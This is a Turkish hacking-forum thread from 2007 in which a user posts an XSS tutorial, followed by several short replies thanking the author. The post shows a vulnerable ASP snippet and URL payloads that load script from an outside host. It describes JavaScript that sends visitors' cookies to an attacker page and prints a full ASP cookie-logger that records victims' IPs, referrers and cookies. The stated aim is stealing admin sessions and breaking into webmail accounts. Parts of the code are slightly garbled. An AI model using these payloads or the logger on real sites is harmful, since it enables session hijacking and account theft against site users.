forumlar
Anasayfa Haftalık İstatistikler Kimler Online Bugünkü Mesajlar GOLD üYE OL Arkadaş listemi göster Profilim Html Renk Kodları
Geri git   Dusler Forum, Forumlar > ~~ BiLGiSAYAR Forum ForumLarı ~~ > Güvenlik Forum , Güvenlik Forumları > +Web ve Güvenlik Acıkları
Sayfaya güncelle XSS Açığı ve Kullanımı
Kayıt ol YardımPageRank Sorgulama Üye Listesi Ajanda Bütün Forumları okunmuş kabul et

+Web ve Güvenlik Acıkları Web ve Güvenlik Acıkları'İle İlgili Bölümümüz..

   

Anahtar Kelimeler: , ,

Cevapla  Yeni Konu aç
 
Seçenekler Stil
Alt 28-08-2007, 02:28 PM   #1
eRİŞİLMEz
∂υѕℓєяƒσяυм υує
 
eRİŞİLMEz - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: Aug 2007
Mesajlar: 60
Konu Sayısı: 6
Seviye: 6 [♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥]
Aktiflik: 0 / 140
Güç: 20 / 1206
Deneyim: 62%
REP Puanı : 17
REP Seviyesi : eRİŞİLMEz is on a distinguished road
Thumbs up XSS Açığı ve Kullanımı
         
Netscape Communications Corporation tarayıcılarında JS scriptlerini çalıştırabildiğni duyurduğunda client ile server arasındaki bağlantı dolayısıyla i=new koduyla kullanıcının Çerez bilgilerinin çalınması sözkonusu oldu.

XSS nin Rfi ile çok küçük bir benzerliği var. Rfi Php scriptlerinde olur ve orda text dosyasındaki kodlar server da php olarak algılanır ve php olarak çalışır. Xss açığı ise açığın olduğu scriptte ister resim ister *.js ister iframe ne olursa olsun include edilebiliyor.

Size örnek bir Xss açığından bahsedeyim.

Active Server Page dilinde yazılmiş bir scripti ele alıyorum.

<%
X = Request.QueryString("id")
response.write X
%>

Görmüş oldu&eth;unuz örnek kodda QueryString Sayfaya yazdırılıyor.
Eğer URL kısmında ; [ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...] yazıyorsa sayfanın herhangi biryerinde XSS yazar.
Bunun yerine;

1)Yazıyı renklendirebiliriz = http://site.com/ornek.asp?id=<font color=red>XSS</font>
2)Resim görüntüleyebilirz = http://site.com/ornek.asp?id=<img src= "http://site2.com/x.jpg">3)Ve güvenlik açığının oluştuğuMicrosoft’un başına dert olan ve milyonlarca Hotmail Hesabının hacklenmesine sebep olan JS kodu yani uzaktan script çalıştırılması.;

http://site.com/ornek.asp?id=<script src= "http://site3">
Şimdi biz x.js yi include ettik ama bu x.js nin içeriği ne olursa sisteme zarar verir ne olmazsa zarar vermez şimdi buna bakalım..

E&eth;er x.js nin içeriği

document.write(’XSS var’) ise sayfada sadece xss var yazar. Ama;

i=new/**/Image();i.Yasak Kelime#8217;[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]

ise şu anda o url de gezinen kimsenin cookiesi x.asp nin X stringine kaydedilir.
şimdi x.asp nin içeriğine bakalım...

<%
Query = Request.QueryString("X")’ Degiskenler tanimlaniyor
If Query = "" Then ’Eger X=bos ise X degiskeni cookie yi alsın yani X=ASPSESSION seklinde karışık değerler..
%>

<script language="JavaScript" type="text/JavaScript">
var mxURL = "?X=" + document.cookie;
window.location = mxURL;
</script>


<%
end if
%>

<%
veri=request.querystring
veri2=right(verilen(veri-2)
adres = Request.ServerVariables("HTTP_REFERER")
Set conn = Server.CreateObject("adodb.connection") ’Burada veritabanı bağlantısı
conn.open "Provider=Microsoft.Jet.Oledb.4.0;Data Source="& Server.MapPath("sniffer.mdb")

set rs = Server.CreateObject("adodb.recordset")
SQL="Select * from sniffer"
rs.open SQLconn13

rs.addnew
rs("ip") = Request.ServerVariables("REMOTE_ADDR") ’IP veritabanına kaydediliyor
rs("adres") = adres ’Çerezin nerden geldiği kaydediliyor
rs("cookie") = veri2 ’Çerez kaydediliyor
rs("tarih") = now ’Burda tarih kaydediliyor çerezlerin karışmaması için
rs.update

rs.close
set rs = nothing
conn.close
set conn = nothing
%>

Burada cookie veritabanına kaydedildi.Şimdi isterseniz bu çerezlere server üzerinden bir fso ile takip edersiniz ister bunları döngüleyecek bir script yazarsınız.Orası size kalmış..
Küçük bir açıklama daha yapacağım;
*Cookielerin çalınmasının amacı sitenin adminlerine yöneliktir çünkü onun giriş yaptığı oturum en yetkili olandır.Normal bir userle siteye zarar veremezsiniz.
*Çerez hırsızlıgının bir başka kullanım alanı ise Mail Sistemlerindeki Cross Site Scripting açıklarının kullanımıdır.Burda hangi oturumun çerezini çalarsanız o kullanıcının mail adresine giriş yapabilirsiniz.
Selametle..
İnşAllah faydalı olabilmişimdir
Selametle..


Adresimiz : w w w. d u s l e r f o r u m. o r g
____________________
[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]
[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]
eRİŞİLMEz isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Alt 28-08-2007, 06:13 PM   #2
kirçiçeği
ƒσяυм ρяєηѕєѕ
 
kirçiçeği - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: Apr 2007
Mesajlar: 552
Konu Sayısı: 51
Seviye: 21 [♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥]
Aktiflik: 0 / 515
Güç: 184 / 4983
Deneyim: 61%
REP Puanı : 73
REP Seviyesi : kirçiçeği will become famous soon enough
Standart
sağol canım eline sağlık
____________________
[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]







[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]
kirçiçeği isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Alt 28-08-2007, 06:16 PM   #3
ilhan_3151
BANLI UYE!
 
ilhan_3151 - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: Aug 2007
Mesajlar: 307
Konu Sayısı: 15
Seviye: 16 [♥ Bé-Yêu ♥]
Aktiflik: 0 / 384
Güç: 102 / 3295
Deneyim: 38%
REP Puanı : 24
REP Seviyesi : ilhan_3151 is on a distinguished road
Standart
tşk kardesım cok işime yaradı yaw basarılarının dewamını beklerıs
ilhan_3151 isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Alt 28-08-2007, 06:50 PM   #4
eRİŞİLMEz
∂υѕℓєяƒσяυм υує
 
eRİŞİLMEz - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: Aug 2007
Mesajlar: 60
Konu Sayısı: 6
Seviye: 6 [♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥]
Aktiflik: 0 / 140
Güç: 20 / 1206
Deneyim: 62%
REP Puanı : 17
REP Seviyesi : eRİŞİLMEz is on a distinguished road
Standart
Rica ederim işinize yaradıysa ne mutlu selametle kolay gelsin
____________________
[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]
[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]
eRİŞİLMEz isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Alt 28-08-2007, 09:57 PM   #5
ilhan_3151
BANLI UYE!
 
ilhan_3151 - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: Aug 2007
Mesajlar: 307
Konu Sayısı: 15
Seviye: 16 [♥ Bé-Yêu ♥]
Aktiflik: 0 / 384
Güç: 102 / 3295
Deneyim: 38%
REP Puanı : 24
REP Seviyesi : ilhan_3151 is on a distinguished road
Standart
sagolasın kardesım emege saygı ve + repppp
ilhan_3151 isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Alt 30-08-2007, 07:00 PM   #6
eRİŞİLMEz
∂υѕℓєяƒσяυм υує
 
eRİŞİLMEz - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: Aug 2007
Mesajlar: 60
Konu Sayısı: 6
Seviye: 6 [♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥]
Aktiflik: 0 / 140
Güç: 20 / 1206
Deneyim: 62%
REP Puanı : 17
REP Seviyesi : eRİŞİLMEz is on a distinguished road
Standart
Tşk ler eksik olma
____________________
[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]
[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]
eRİŞİLMEz isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Alt 30-08-2007, 07:01 PM   #7
sonsuzluk186
dυѕLєяƒσяυм üує
 
sonsuzluk186 - ait Kullanıcı Resmi (Avatar)
 
DF İstanbul Şubesi
Üyelik tarihi: Jul 2007
Kan Grubu: A RH (+) Cinsiyet:
Mesajlar: 3.727
Konu Sayısı: 660
Ruh Hali:
Seviye: 46 [♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥]
Aktiflik: 341 / 1138
Güç: 1242 / 10002
Deneyim: 55%
REP Puanı : 166
REP Seviyesi : sonsuzluk186 has a spectacular aura aboutsonsuzluk186 has a spectacular aura about
Standart
emegıne saglık kardesımm + rep
sonsuzluk186 isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Alt 30-08-2007, 07:10 PM   #8
eRİŞİLMEz
∂υѕℓєяƒσяυм υує
 
eRİŞİLMEz - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: Aug 2007
Mesajlar: 60
Konu Sayısı: 6
Seviye: 6 [♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥]
Aktiflik: 0 / 140
Güç: 20 / 1206
Deneyim: 62%
REP Puanı : 17
REP Seviyesi : eRİŞİLMEz is on a distinguished road
Standart
Tşk ler çok güselya emek karşılıksız kalmıyo selametle
____________________
[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]
[ Üye Olmadan Linkleri Göremezsiniz. Üye Olmak İçin Tıklayın...]
eRİŞİLMEz isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Alt 29-01-2008, 09:46 AM   #9
Fearles
dυѕLєяƒσяυм üує
 
Fearles - ait Kullanıcı Resmi (Avatar)
 
DF Uşak Şubesi
Üyelik tarihi: Dec 2007
Cinsiyet:
Mesajlar: 1.415
Konu Sayısı: 199
Ruh Hali:
Seviye: 32 [♥ Bé-Yêu ♥]
Aktiflik: 78 / 781
Güç: 471 / 6061
Deneyim: 27%
REP Puanı : 47
REP Seviyesi : Fearles is on a distinguished road
Standart
Paylasım İçin Teşşekkürler
____________________
<========== FoRéVéR HayKo

29 Şubat 2008 - Hayko Cepkin @ Ankara Koneri

28 Şubat 2008 - Hayko Cepkin @ Eskişehir

22 Şubat 2008 - Hayko Cepkin @ İzmit
Fearles isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Cevapla


« önceki Konu | sonraki Konu »

Seçenekler
Stil
Normal Normal


Design ßy:OzKaN ®
Tüm Hakları DuSLeRFoRuM.ORG'a Aittir
Powered by vBulletin
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
Forum SEO by Zoints
sesli chat | kopukforum | Emo Resimleri | forumlar |esra erol | forumlar | bal | Kalibrasyon | Kalibrasyon eğitimi | Engelli araç |Akülü araç
Tüm Hakları Saklıdır ©2006 - 2010 Site içeriği ve grafiklerimiz izinsiz ve kaynak gösterilmeden kullanılamaz.

alexa stats Forumlar, Forum, Eglence Forum Siteleri, Emo Resimleri, Ask Sevgi, Resimleri, Korku Forumları RSS Feeds - İletişim - Etiketler - Forumlar, Forum, Eglence Forum Siteleri, Emo Resimleri, Ask Sevgi, Resimleri, Korku Forumları - Arşiv